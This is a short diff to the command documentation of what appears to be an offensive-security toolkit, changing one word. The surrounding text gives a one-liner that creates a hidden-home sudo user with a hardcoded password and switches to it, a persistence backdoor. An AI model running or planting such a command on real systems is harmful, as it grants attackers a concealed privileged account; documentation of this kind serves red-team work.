grisuno/LazyOwn/COMMANDS.md

 Manual execution:
 To manually execute the command:
 - Copy the command from the clipboard.
-- Run it in a terminal to create the user and set up the permissions as specified. useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && su - grisun0
+- Run it in a terminal to create the user and assign up the permissions as specified. useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && su - grisun0
 Note: Ensure `xclip` is installed and available on your system.

 ## winbase64payload